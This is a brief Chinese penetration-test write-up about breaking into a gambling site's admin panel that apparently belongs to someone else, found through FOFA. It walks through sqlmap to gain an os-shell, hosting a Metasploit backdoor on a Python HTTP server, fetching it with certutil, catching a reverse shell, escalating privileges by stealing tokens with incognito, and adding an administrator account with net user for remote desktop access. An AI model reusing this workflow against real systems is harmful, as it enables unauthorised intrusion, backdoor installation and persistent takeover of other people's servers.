0x01 收集信息
因为主要想练习sql注入,所以信息收集做的比较简单:
通过fofa找到相关cms,这里发现棋牌后台登录处存在SQL注入漏洞
0x02 漏洞利用
1.利用sqlmap一把梭,并获取os-shell
2.利用python搭建一个简单的http服务器,并挂载MSF生成的后门文件
python -m SimpleHTTPServer
3.os-shell下远程下载后门执行程序
在os-shell下通过命令创建一个目录
mkdir C:\test
在os-shell下通过certutil命令远程下载后门文件到服务器上
4.执行msf反弹shell
use exploit/mulit/hander
set lhost 接收反弹shell的ip
run
5.成功进入该服务器
这时发现我们只有gust权限 难受
6.对目标服务器进行提权
提权方法:内核提权以及窃取管理tokens提权
本文只利用窃取管理tokens提权
使用use incognito来加载会话令牌模块
然后list_tokens -u来列出会话令牌
7.创建用户
命令:net user 用户名 密码 /add
0x03 渗透总结
1.通过SQLmap获取os-shell
2.在msf下生产后门文件
3.通过python -m SimpleHTTPServer 搭建http服务器,并将生成的后门文件拷贝到到http服务器目录下。
2.在os-shell模式下创建目录,并通过certutil远程下载http服务器上的后门。
4.通过MSF反弹shell。在MSF下添加用户以及添加到管理员组,可远程桌面登录